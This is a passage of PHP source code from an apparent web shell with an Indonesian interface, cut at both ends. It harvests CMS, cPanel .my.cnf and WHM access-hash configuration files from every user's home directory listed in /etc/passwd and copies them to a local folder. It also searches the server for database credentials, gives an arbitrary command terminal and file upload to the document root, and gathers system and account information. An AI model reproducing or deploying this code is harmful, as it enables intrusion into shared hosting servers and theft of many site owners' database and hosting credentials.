"4", 
"/home/USER/public_html/conf_global.php" => "invisio", "/home/USER/public_html/include/db.php" => "7", "/home/USER/public_html/connect.php" => "8", "/home/USER/public_html/mk_conf.php" => "mk-portale1", "/home/USER/public_html/include/config.php" => "12", "/home/USER/public_html/settings.php" => "Smf", "/home/USER/public_html/includes/functions.php" => "phpbb3", // PopojiCMS "/home/USER/public_html/po-content/config.php" => "Popoji", // Voodoo "/home/USER/public_html/vdo_config.php" => "Voodoo", // BosWeb "/home/USER/public_html/bw-configs/config.ini" => "BosWeb", // Lokomedia "/home/USER/public_html/config/koneksi.php" => "Lokomedia", "/home/USER/public_html/lokomedia/config/koneksi.php" => "Lokomedia", // Drupal "/home/USER/public_html/sites/default/settings.php" => "Drupal", // PrestaShop "/home/USER/public_html/config/settings.inc.php" => "PrestaShop", // Magento "/home/USER/public_html/app/etc/local.xml" => "Magento", // OpenCart "/home/USER/public_html/admin/config.php" => "OpenCart", "/home/USER/public_html/config.php" => "OpenCart-config", // Sitelok "/home/USER/public_html/slconfig.php" => "Sitelok", // EllisLab (ExpressionEngine) "/home/USER/public_html/application/config/database.php" => "Ellislab", // CPanel/WHM "/home/USER/.my.cnf" => "cpanel", "/home/USER/.accesshash" => "WHM-accesshash" ); // Home directories 1-7 $home_dirs = ['', '2', '3', '4', '5', '6', '7']; echo '<div class="table-responsive"> <table class="table table-dark table-sm"> <thead> <tr> <th>User</th> <th>Config Found</th> <th>File</th> <th>Status</th> </tr> </thead> <tbody>'; while($passwd = @fgets($etc)) { if(preg_match('/^([^:]+):x:/', $passwd, $matches)) { $user_idx = $matches[1]; $users_found++; $user_configs_found = 0; foreach($home_dirs as $home_num) { $home_prefix = $home_num ? 
"home{$home_num}" : "home"; $user_config_dir = "/{$home_prefix}/{$user_idx}/public_html/"; if(is_readable("/{$home_prefix}/{$user_idx}/")) { foreach($grab_config as $config_pattern => $config_name) { $config_file = str_replace("USER", $user_idx, $config_pattern); $config_file = str_replace("/home/", "/{$home_prefix}/", $config_file); if(file_exists($config_file) && is_readable($config_file)) { $configs_found++; $user_configs_found++; // Save config to file $config_content = @file_get_contents($config_file); if($config_content !== false && trim($config_content) != '') { $output_file = $config_dir . "/{$user_idx}-{$config_name}.txt"; @file_put_contents($output_file, $config_content); echo '<tr> <td><span class="badge bg-info">'.$user_idx.'</span></td> <td><span class="badge bg-success">'.$config_name.'</span></td> <td><small>'.htmlspecialchars(basename($config_file)).'</small></td> <td><span class="badge bg-success">Saved</span></td> </tr>'; } } } } } // Jika tidak ada config yang ditemukan untuk user ini if($user_configs_found == 0) { echo '<tr> <td><span class="badge bg-info">'.$user_idx.'</span></td> <td colspan="3"><small class="text-muted">No configurations found</small></td> </tr>'; } } } @fclose($etc); echo '</tbody></table></div>'; echo '<div class="alert '.($configs_found > 0 ? 'alert-success' : 'alert-warning').' mt-3"> <i class="bi '.($configs_found > 0 ? 'bi-check-circle' : 'bi-exclamation-triangle').' me-2"></i> <strong>Scan Complete:</strong><br> Users scanned: '.$users_found.'<br> Configurations found: '.$configs_found.'<br> Files saved to: pbm_config/ </div>'; if($configs_found > 0) { echo '<div class="d-grid gap-2"> <a href="?dir='.urlencode($config_dir).'" class="btn btn-success"> <i class="bi bi-folder me-2"></i>Open pbm_config Directory ('.$configs_found.' 
files) </a> </div>'; } } } // Quick Scan Options echo '<hr class="bg-secondary"> <div class="row"> <div class="col-md-6"> <div class="card bg-dark border-primary"> <div class="card-header bg-primary"> <i class="bi bi-lightning me-2"></i>Quick CMS Scan </div> <div class="card-body"> <form method="post"> <div class="mb-3"> <label class="form-label">Scan Directory:</label> <input type="text" name="scan_cms_dir" class="form-control bg-dark text-light" value="'.$dir.'" placeholder="/path/to/scan"> </div> <div class="mb-3"> <label class="form-label">CMS Types:</label> <div class="form-check"> <input class="form-check-input" type="checkbox" name="cms_types[]" value="wordpress" checked> <label class="form-check-label">WordPress</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" name="cms_types[]" value="joomla" checked> <label class="form-check-label">Joomla</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" name="cms_types[]" value="drupal" checked> <label class="form-check-label">Drupal</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" name="cms_types[]" value="vbulletin"> <label class="form-check-label">vBulletin</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" name="cms_types[]" value="whmcs"> <label class="form-check-label">WHMCS</label> </div> </div> <button type="submit" name="quick_cms_scan" class="btn btn-primary w-100"> <i class="bi bi-search me-2"></i>Quick CMS Scan </button> </form> </div> </div> </div> <div class="col-md-6"> <div class="card bg-dark border-success"> <div class="card-header bg-success"> <i class="bi bi-database me-2"></i>Database Config Scanner </div> <div class="card-body"> <form method="post"> <div class="mb-3"> <label class="form-label">Search for Database Credentials:</label> <select name="db_search_type" class="form-select bg-dark text-light"> <option value="all">All Database Files</option> 
<option value="wp">WordPress (wp-config.php)</option> <option value="joomla">Joomla (configuration.php)</option> <option value="config">Config Files</option> <option value="env">.env Files</option> </select> </div> <button type="submit" name="scan_db_configs" class="btn btn-success w-100"> <i class="bi bi-database-fill me-2"></i>Scan Database Configs </button> </form> </div> </div> </div> </div>'; // Handle quick CMS scan if(isset($_POST['quick_cms_scan'])) { $scan_dir = $_POST['scan_cms_dir']; $cms_types = $_POST['cms_types'] ?? []; echo '<div class="mt-4"> <h6><i class="bi bi-search me-2"></i>Quick CMS Scan Results:</h6>'; if(is_dir($scan_dir) && is_readable($scan_dir)) { $cms_patterns = []; if(in_array('wordpress', $cms_types)) { $cms_patterns['WordPress'] = ['wp-config.php']; } if(in_array('joomla', $cms_types)) { $cms_patterns['Joomla'] = ['configuration.php']; } if(in_array('drupal', $cms_types)) { $cms_patterns['Drupal'] = ['sites/default/settings.php']; } if(in_array('vbulletin', $cms_types)) { $cms_patterns['vBulletin'] = ['includes/config.php']; } if(in_array('whmcs', $cms_types)) { $cms_patterns['WHMCS'] = ['configuration.php']; } $found_cms = []; // Recursive scan function function scanForCMS($dir, $patterns, &$found, $depth = 0, $max_depth = 3) { if($depth >= $max_depth) return; if(!is_dir($dir) || !is_readable($dir)) return; $items = @scandir($dir); if(!$items) return; foreach($items as $item) { if($item == '.' || $item == '..') continue; $path = $dir . '/' . 
$item; if(is_dir($path)) { scanForCMS($path, $patterns, $found, $depth + 1, $max_depth); } elseif(is_file($path)) { foreach($patterns as $cms_name => $cms_files) { foreach($cms_files as $cms_file) { if(basename($path) == $cms_file) { $found[] = [ 'cms' => $cms_name, 'file' => $path, 'dir' => dirname($path) ]; } } } } } } scanForCMS($scan_dir, $cms_patterns, $found_cms); if(!empty($found_cms)) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> Found '.count($found_cms).' CMS configuration files </div> <div class="table-responsive"> <table class="table table-dark table-sm"> <thead> <tr> <th>CMS</th> <th>Config File</th> <th>Directory</th> <th>Actions</th> </tr> </thead> <tbody>'; foreach($found_cms as $cms) { echo '<tr> <td><span class="badge bg-success">'.$cms['cms'].'</span></td> <td><code>'.htmlspecialchars(basename($cms['file'])).'</code></td> <td><small>'.$cms['dir'].'</small></td> <td> <a href="?act=view&dir='.urlencode($cms['dir']).'&file='.urlencode($cms['file']).'" class="btn btn-sm btn-outline-info"> <i class="bi bi-eye"></i> View </a> <a href="?dir='.urlencode($cms['dir']).'" class="btn btn-sm btn-outline-warning"> <i class="bi bi-folder2-open"></i> Open </a> </td> </tr>'; } echo '</tbody></table></div>'; } else { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> No CMS configuration files found in the specified directory </div>'; } } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Cannot read directory: '.$scan_dir.' 
</div>'; } echo '</div>'; } // Handle database config scan if(isset($_POST['scan_db_configs'])) { $search_type = $_POST['db_search_type']; echo '<div class="mt-4"> <h6><i class="bi bi-database-fill me-2"></i>Database Config Scan Results:</h6>'; // Patterns for database configs $db_patterns = [ 'wp-config.php' => 'WordPress', 'configuration.php' => 'Joomla', 'settings.php' => 'Drupal', 'config.php' => 'General Config', '.env' => 'Environment', 'database.php' => 'Laravel/CodeIgniter', 'local.xml' => 'Magento', 'settings.inc.php' => 'PrestaShop' ]; // Filter based on search type $filtered_patterns = []; switch($search_type) { case 'wp': $filtered_patterns = ['wp-config.php' => 'WordPress']; break; case 'joomla': $filtered_patterns = ['configuration.php' => 'Joomla']; break; case 'config': $filtered_patterns = ['config.php' => 'General Config', 'configuration.php' => 'Joomla']; break; case 'env': $filtered_patterns = ['.env' => 'Environment']; break; default: $filtered_patterns = $db_patterns; } // Search in common locations $common_locations = [ $dir, '/home', '/var/www', '/var/www/html', '/usr/local/apache2/htdocs' ]; $found_db_configs = []; foreach($common_locations as $location) { if(is_dir($location) && is_readable($location)) { foreach($filtered_patterns as $file_pattern => $file_type) { $command = "find " . escapeshellarg($location) . " -name '" . $file_pattern . 
"' -type f 2>/dev/null | head -20"; $files = @shell_exec($command); if($files) { $file_list = explode("\n", trim($files)); foreach($file_list as $file) { if(!empty($file) && file_exists($file)) { $content = @file_get_contents($file); if($content && (preg_match('/DB_HOST|dbname|database|localhost|127.0.0.1/i', $content) || preg_match('/define.*DB_|mysql_connect|mysqli_connect/i', $content))) { $found_db_configs[] = [ 'file' => $file, 'type' => $file_type, 'dir' => dirname($file), 'has_db' => true ]; } } } } } } } if(!empty($found_db_configs)) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> Found '.count($found_db_configs).' database configuration files </div> <div class="table-responsive"> <table class="table table-dark table-sm"> <thead> <tr> <th>Type</th> <th>File</th> <th>Directory</th> <th>DB Info</th> <th>Actions</th> </tr> </thead> <tbody>'; foreach($found_db_configs as $db_config) { // Try to extract database info $content = @file_get_contents($db_config['file']); $db_info = 'Not found'; if($content) { if(preg_match('/define.*[\'"]DB_NAME[\'"].*[\'"]([^\'"]+)[\'"]/i', $content, $matches)) { $db_info = 'DB: ' . $matches[1]; } elseif(preg_match('/[\'"]database[\'"]\s*=>\s*[\'"]([^\'"]+)[\'"]/i', $content, $matches)) { $db_info = 'DB: ' . $matches[1]; } elseif(preg_match('/dbname=([^;]+)/i', $content, $matches)) { $db_info = 'DB: ' . 
$matches[1]; } } echo '<tr> <td><span class="badge bg-info">'.$db_config['type'].'</span></td> <td><code>'.htmlspecialchars(basename($db_config['file'])).'</code></td> <td><small>'.$db_config['dir'].'</small></td> <td><small>'.$db_info.'</small></td> <td> <a href="?act=view&dir='.urlencode($db_config['dir']).'&file='.urlencode($db_config['file']).'" class="btn btn-sm btn-outline-info"> <i class="bi bi-eye"></i> View </a> <a href="?dir='.urlencode($db_config['dir']).'" class="btn btn-sm btn-outline-warning"> <i class="bi bi-folder2-open"></i> Open </a> </td> </tr>'; } echo '</tbody></table></div>'; } else { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> No database configuration files found </div>'; } echo '</div>'; } echo '</div></div>'; } // Tab Archive Tools - DIPERBAIKI (Detect Archive di current dir) elseif($_GET['do'] == 'archive') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-file-zip me-2"></i>Archive Tools</h5> </div> <div class="card-body">'; // Detect archive files in current directory $archive_files = detectArchiveFiles($dir); if(!empty($archive_files)) { echo '<div class="alert alert-info"> <i class="bi bi-info-circle me-2"></i> <strong>Archive Files Found in Current Directory:</strong> </div> <div class="table-responsive"> <table class="table table-dark table-sm"> <thead> <tr> <th>File Name</th> <th>Type</th> <th>Size</th> <th>Actions</th> </tr> </thead> <tbody>'; foreach($archive_files as $archive) { $ext_badge = ''; switch($archive['ext']) { case 'zip': $ext_badge = 'bg-success'; break; case 'tar': $ext_badge = 'bg-primary'; break; case 'gz': $ext_badge = 'bg-warning'; break; case 'bz2': $ext_badge = 'bg-danger'; break; case 'rar': $ext_badge = 'bg-info'; break; default: $ext_badge = 'bg-secondary'; } echo '<tr> <td> <i class="bi bi-file-zip me-2"></i> '.$archive['name'].' 
</td> <td><span class="badge '.$ext_badge.'">.'.$archive['ext'].'</span></td> <td><span class="badge bg-secondary">'.$archive['size'].'</span></td> <td> <form method="post" class="d-inline"> <input type="hidden" name="archive_file" value="'.$archive['path'].'"> <button type="submit" name="extract_archive" class="btn btn-sm btn-outline-success"> <i class="bi bi-file-earmark-arrow-down"></i> Extract </button> </form> <a href="?act=download&dir='.urlencode($dir).'&file='.urlencode($archive['path']).'" class="btn btn-sm btn-outline-info"> <i class="bi bi-download"></i> Download </a> </td> </tr>'; } echo '</tbody></table></div><hr class="bg-secondary">'; } else { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> No archive files found in current directory </div>'; } echo '<div class="row g-4">'; // Archive Operations echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-success"> <i class="bi bi-file-arrow-down me-2"></i>Extract Archive </div> <div class="card-body"> <form method="post" enctype="multipart/form-data"> <div class="mb-3"> <label class="form-label">Upload Archive File:</label> <input type="file" name="archive_file" class="form-control bg-dark text-light"> <small class="text-muted">Supported: .zip, .tar, .tar.gz, .tar.bz2, .rar</small> </div> <div class="mb-3"> <label class="form-label">Or Use Existing File:</label> <input type="text" name="existing_archive" class="form-control bg-dark text-light" placeholder="/path/to/archive.zip"> </div> <div class="mb-3"> <label class="form-label">Extract To (optional):</label> <input type="text" name="extract_path" class="form-control bg-dark text-light" placeholder="Leave empty for current directory" value="'.$dir.'"> </div> <button type="submit" name="do_extract" class="btn btn-success w-100"> <i class="bi bi-file-earmark-arrow-down me-2"></i>Extract Archive </button> </form>'; if(isset($_POST['do_extract'])) { $extract_to = $_POST['extract_path'] ?: 
$dir; if(isset($_FILES['archive_file']) && $_FILES['archive_file']['error'] == 0) { $tmp_file = $_FILES['archive_file']['tmp_name']; $orig_name = $_FILES['archive_file']['name']; $target_file = sys_get_temp_dir() . '/' . $orig_name; if(move_uploaded_file($tmp_file, $target_file)) { if(unarchiveFile($target_file, $extract_to)) { echo '<div class="alert alert-success mt-3"> <i class="bi bi-check-circle me-2"></i> Archive extracted successfully to <code>'.$extract_to.'</code> </div>'; } else { echo '<div class="alert alert-danger mt-3"> <i class="bi bi-x-circle me-2"></i> Failed to extract archive. Make sure the file format is supported. </div>'; } @unlink($target_file); } } elseif(!empty($_POST['existing_archive'])) { $archive_file = $_POST['existing_archive']; if(file_exists($archive_file) && is_readable($archive_file)) { if(unarchiveFile($archive_file, $extract_to)) { echo '<div class="alert alert-success mt-3"> <i class="bi bi-check-circle me-2"></i> Archive extracted successfully to <code>'.$extract_to.'</code> </div>'; } else { echo '<div class="alert alert-danger mt-3"> <i class="bi bi-x-circle me-2"></i> Failed to extract archive. Make sure the file format is supported. </div>'; } } else { echo '<div class="alert alert-danger mt-3"> <i class="bi bi-x-circle me-2"></i> Archive file not found or not readable: '.$archive_file.' 
</div>'; } } else { echo '<div class="alert alert-warning mt-3"> <i class="bi bi-exclamation-triangle me-2"></i> Please select an archive file or enter a path </div>'; } } // Handle extract from detected archives if(isset($_POST['extract_archive'])) { $archive_file = $_POST['archive_file']; $extract_to = $dir; if(unarchiveFile($archive_file, $extract_to)) { echo '<div class="alert alert-success mt-3"> <i class="bi bi-check-circle me-2"></i> Archive extracted successfully to <code>'.$extract_to.'</code> </div>'; } else { echo '<div class="alert alert-danger mt-3"> <i class="bi bi-x-circle me-2"></i> Failed to extract archive </div>'; } } echo '</div></div></div>'; // Create Archive echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-primary"> <i class="bi bi-file-arrow-up me-2"></i>Create Archive </div> <div class="card-body"> <form method="post"> <div class="mb-3"> <label class="form-label">Directory to Archive:</label> <input type="text" name="archive_dir" class="form-control bg-dark text-light" value="'.$dir.'" required> </div> <div class="mb-3"> <label class="form-label">Archive Name:</label> <input type="text" name="archive_name" class="form-control bg-dark text-light" value="backup_'.date('Y-m-d').'.zip" required> </div> <div class="mb-3"> <label class="form-label">Archive Type:</label> <select name="archive_type" class="form-select bg-dark text-light"> <option value="zip">ZIP (.zip)</option> <option value="tar">TAR (.tar)</option> <option value="tgz">GZipped TAR (.tar.gz)</option> </select> </div> <button type="submit" name="create_archive" class="btn btn-primary w-100"> <i class="bi bi-file-earmark-arrow-up me-2"></i>Create Archive </button> </form>'; if(isset($_POST['create_archive'])) { $archive_dir = $_POST['archive_dir']; $archive_name = $_POST['archive_name']; $archive_type = $_POST['archive_type']; $archive_path = $dir . '/' . 
$archive_name; if(is_dir($archive_dir) && is_readable($archive_dir)) { // Untuk ZIP if($archive_type == 'zip' && class_exists('ZipArchive')) { $zip = new ZipArchive(); if($zip->open($archive_path, ZipArchive::CREATE) === TRUE) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($archive_dir), RecursiveIteratorIterator::LEAVES_ONLY ); foreach($files as $file) { if(!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($archive_dir) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); echo '<div class="alert alert-success mt-3"> <i class="bi bi-check-circle me-2"></i> Archive created successfully: <code>'.$archive_path.'</code><br> Size: '.formatSize($archive_path).' </div>'; } else { echo '<div class="alert alert-danger mt-3"> <i class="bi bi-x-circle me-2"></i> Failed to create ZIP archive </div>'; } } else { echo '<div class="alert alert-warning mt-3"> <i class="bi bi-exclamation-triangle me-2"></i> ZIP creation requires ZipArchive class. Try using shell commands instead. </div>'; } } else { echo '<div class="alert alert-danger mt-3"> <i class="bi bi-x-circle me-2"></i> Directory not found or not readable: '.$archive_dir.' </div>'; } } // Check archive support echo '<div class="mt-3"> <h6><i class="bi bi-gear me-2"></i>Archive Support Status:</h6> <table class="table table-dark table-sm"> <tr> <td>ZipArchive Class:</td> <td>'.(class_exists('ZipArchive') ? '<span class="badge bg-success">Available</span>' : '<span class="badge bg-danger">Not Available</span>').'</td> </tr> <tr> <td>PharData Class:</td> <td>'.(class_exists('PharData') ? '<span class="badge bg-success">Available</span>' : '<span class="badge bg-danger">Not Available</span>').'</td> </tr> <tr> <td>Shell Exec for tar/zip:</td> <td>'.(function_exists('shell_exec') ? 
'<span class="badge bg-success">Available</span>' : '<span class="badge bg-warning">Limited</span>').'</td> </tr> </table> </div>'; echo '</div></div></div></div></div></div>'; } // Tab System Info - DIPERBAIKI (Network Info) elseif($_GET['do'] == 'system') { $php_version = PHP_VERSION; $safe_mode = (@ini_get("safe_mode") == 'on') ? checkStatus(false) : checkStatus(true); $magic_quotes = (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) ? checkStatus(true) : checkStatus(false); $mysql = (function_exists('mysqli_connect')) ? checkStatus(true) : checkStatus(false); $exec = (function_exists('exec')) ? checkStatus(true) : checkStatus(false); $open_basedir = (ini_get("open_basedir")) ? checkStatus(true) : checkStatus(false); $symlink = (function_exists('symlink')) ? checkStatus(true) : checkStatus(false); echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-server me-2"></i>System Information</h5> </div> <div class="card-body"> <div class="row g-4">'; // Basic Info Column echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">Basic Info</div> <div class="card-body"> <table class="table table-dark table-sm"> <tr><td><strong>OS</strong></td><td>'.$os.'</td></tr> <tr><td><strong>Kernel</strong></td><td>'.$kernel.'</td></tr> <tr><td><strong>Server Software</strong></td><td>'.$_SERVER['SERVER_SOFTWARE'].'</td></tr> <tr><td><strong>PHP Version</strong></td><td><span class="badge bg-info">'.$php_version.'</span></td></tr> <tr><td><strong>Document Root</strong></td><td>'.$_SERVER['DOCUMENT_ROOT'].'</td></tr> </table> </div> </div> </div>'; // PHP Features Column echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">PHP Features</div> <div class="card-body"> <table class="table table-dark table-sm"> <tr><td><strong>Safe Mode</strong></td><td>'.$safe_mode.'</td></tr> <tr><td><strong>Magic Quotes</strong></td><td>'.$magic_quotes.'</td></tr> 
<tr><td><strong>Open Basedir</strong></td><td>'.$open_basedir.'</td></tr> <tr><td><strong>Exec Function</strong></td><td>'.$exec.'</td></tr> <tr><td><strong>Symlink</strong></td><td>'.$symlink.'</td></tr> <tr><td><strong>MySQL Support</strong></td><td>'.$mysql.'</td></tr> </table> </div> </div> </div>'; // Tools Column echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">Available Tools</div> <div class="card-body"> <table class="table table-dark table-sm"> <tr><td><strong>cURL</strong></td><td>'.$curl.'</td></tr> <tr><td><strong>Wget</strong></td><td>'.$wget.'</td></tr> <tr><td><strong>Perl</strong></td><td>'.$perl.'</td></tr> <tr><td><strong>Python</strong></td><td>'.$python.'</td></tr> <tr><td><strong>Disk Space Free</strong></td><td>'.$freespace.'</td></tr> <tr><td><strong>Disk Space Total</strong></td><td>'.$total.'</td></tr> </table> </div> </div> </div>'; // Network Column - DIPERBAIKI echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">Network Info</div> <div class="card-body"> <table class="table table-dark table-sm"> <tr><td><strong>Server IP</strong></td><td>'.'Server IP - '.$server_ip.' 
{'.$_SERVER['REMOTE_ADDR'].'}</td></tr> <tr><td><strong>Your IP</strong></td><td>'.$ip_user.'</td></tr> <tr><td><strong>Hostname</strong></td><td>'.gethostname().'</td></tr> <tr><td><strong>User Agent</strong></td><td>'.$_SERVER['HTTP_USER_AGENT'].'</td></tr> <tr><td colspan="2"><strong>Disabled Functions:</strong></td></tr> <tr><td colspan="2"><textarea class="form-control bg-dark text-light" rows="3" readonly>'.$show_ds.'</textarea></td></tr> </table> </div> </div> </div>'; echo '</div></div></div>'; // OS Specific Information if ($os == 'Windows') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-windows me-2"></i>Windows Information</h5> </div> <div class="card-body"> <div class="row g-4">'; $account_settings = exe('net accounts'); $account_user = exe('net user'); echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">User Accounts</div> <div class="card-body"> <pre class="terminal-output" style="max-height: 300px;">'.$account_user.'</pre> </div> </div> </div>'; echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">System Accounts</div> <div class="card-body"> <pre class="terminal-output" style="max-height: 300px;">'.$account_settings.'</pre> </div> </div> </div>'; echo '</div></div></div>'; } if ($os == 'Linux') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-ubuntu me-2"></i>Linux Information</h5> </div> <div class="card-body">'; $hdd_space = exe('df -h'); $hosts = exe('cat /etc/hosts'); echo '<div class="row g-4"> <div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">Disk Usage</div> <div class="card-body"> <pre class="terminal-output">'.$hdd_space.'</pre> </div> </div> </div> <div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">System Info</div> <div class="card-body"> <table class="table table-dark table-sm"> 
<tr><td><strong>Distribution</strong></td><td>'.exe('cat /etc/issue').'</td></tr> <tr><td><strong>Current User</strong></td><td>'.exe('whoami').'</td></tr> <tr><td><strong>Hosts File</strong></td>'; if (is_readable('/etc/passwd')) { echo '<td><a href="?act=view&file=/etc/passwd" class="btn btn-sm btn-outline-info">View /etc/passwd</a></td>'; } else { echo '<td><span class="badge bg-danger">Not Readable</span></td>'; } echo '</tr></table> </div> </div> </div> </div> </div> </div>'; } } // ========== TAB-TAB LAINNYA ========== // Tab Upload (dari kode asli) elseif($_GET['do'] == 'upload') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-cloud-upload me-2"></i>File Upload</h5> </div> <div class="card-body"> <form method="post" enctype="multipart/form-data"> <div class="mb-3"> <label class="form-label">Upload Location:</label> <div class="form-check mb-2"> <input class="form-check-input" type="radio" name="tipe_upload" value="biasa" checked> <label class="form-check-label"> Current Directory '.w($dir, "").' </label> </div> <div class="form-check mb-3"> <input class="form-check-input" type="radio" name="tipe_upload" value="home_root"> <label class="form-check-label"> Document Root '.w($_SERVER["DOCUMENT_ROOT"], "").' 
</label> </div> </div> <div class="mb-3"> <input type="file" name="ix_file" class="form-control bg-dark text-light"> </div> <button type="submit" name="upload" class="btn btn-primary"> <i class="bi bi-upload me-2"></i>Upload File </button> </form>'; if(isset($_POST['upload'])) { echo '<div class="mt-3">'; if($_POST['tipe_upload'] == 'biasa') { if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i>Uploaded to: <code>'.$dir.'/'.$_FILES['ix_file']['name'].'</code> </div>'; } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i>Failed to upload file </div>'; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i>Uploaded to: <code>'.$root.'</code><br> <a href="http://'.$web.'" target="_blank" class="btn btn-sm btn-outline-info mt-2"> <i class="bi bi-box-arrow-up-right me-1"></i>Open: http://'.$web.' 
</a> </div>'; } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i>Failed to upload file </div>'; } } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i>Document root is not writable </div>'; } } echo '</div>'; } echo '</div></div>'; } // Tab Command Terminal (dari kode asli) elseif($_GET['do'] == 'cmd') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-terminal me-2"></i>Terminal</h5> </div> <div class="card-body"> <form method="post" class="mb-4"> <div class="input-group"> <span class="input-group-text bg-dark text-light border-secondary"> <i class="bi bi-terminal"></i> </span> <input type="text" class="form-control bg-dark text-light border-secondary" name="cmd" placeholder="'.$user.'@'.$_SERVER['HTTP_HOST'].':~$" value="'.(isset($_POST['cmd'])?htmlspecialchars($_POST['cmd']):'').'"> <button type="submit" name="do_cmd" class="btn btn-primary"> <i class="bi bi-play-fill me-1"></i>Execute </button> </div> </form>'; if(isset($_POST['do_cmd'])) { echo '<div class="mb-3"> <label class="form-label">Command Output:</label> <pre class="terminal-output">'.exe($_POST['cmd']).'</pre> </div>'; } // Quick commands echo '<div class="mt-4"> <h6><i class="bi bi-lightning me-2"></i>Quick Commands:</h6> <div class="d-flex flex-wrap gap-2"> <a href="?do=cmd&dir='.$dir.'&cmd=whoami" class="btn btn-sm btn-outline-info">whoami</a> <a href="?do=cmd&dir='.$dir.'&cmd=pwd" class="btn btn-sm btn-outline-info">pwd</a> <a href="?do=cmd&dir='.$dir.'&cmd=ls -la" class="btn btn-sm btn-outline-info">ls -la</a> <a href="?do=cmd&dir='.$dir.'&cmd=uname -a" class="btn btn-sm btn-outline-info">uname -a</a> <a href="?do=cmd&dir='.$dir.'&cmd=php -v" class="btn btn-sm btn-outline-info">php -v</a> </div> </div> </div> </div>'; } // Tab Recursive Scan (dari kode asli) elseif($_GET['do'] == 'scan') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi 
bi-search me-2"></i>Recursive Directory Scanner</h5> </div> <div class="card-body">'; echo '<form method="post" class="mb-4"> <div class="row g-3"> <div class="col-md-6"> <label class="form-label">Directory to Scan:</label> <input type="text" name="scan_dir" class="form-control bg-dark text-light" value="'.($dir ?: getHomeDirectory()).'" required> </div> <div class="col-md-4"> <label class="form-label">File Extensions (comma separated):</label> <input type="text" name="scan_ext" class="form-control bg-dark text-light" placeholder="php,html,js,conf,config" value="'.($_POST['scan_ext'] ?? '').'"> </div> <div class="col-md-2"> <label class="form-label">Max Depth:</label> <input type="number" name="scan_depth" class="form-control bg-dark text-light" value="'.($_POST['scan_depth'] ?? 5).'" min="1" max="20"> </div> </div> <div class="mt-3"> <button type="submit" name="do_scan" class="btn btn-primary"> <i class="bi bi-search me-2"></i>Start Scanning </button> </div> </form>'; if(isset($_POST['do_scan'])) { $scan_dir = $_POST['scan_dir']; $extensions = array_map('trim', explode(',', $_POST['scan_ext'])); $extensions = array_filter($extensions); $max_depth = intval($_POST['scan_depth']); echo '<div class="alert alert-info"> <i class="bi bi-info-circle me-2"></i> Scanning directory: <code>'.$scan_dir.'</code><br> Extensions: '.($extensions ? implode(', ', $extensions) : 'All files').' | Max Depth: '.$max_depth.' </div>'; if(is_dir($scan_dir) && is_readable($scan_dir)) { $start_time = microtime(true); $files = recursiveScan($scan_dir, $extensions, $max_depth); $end_time = microtime(true); $scan_time = round($end_time - $start_time, 3); echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> Found '.count($files).' files in '.$scan_time.' 
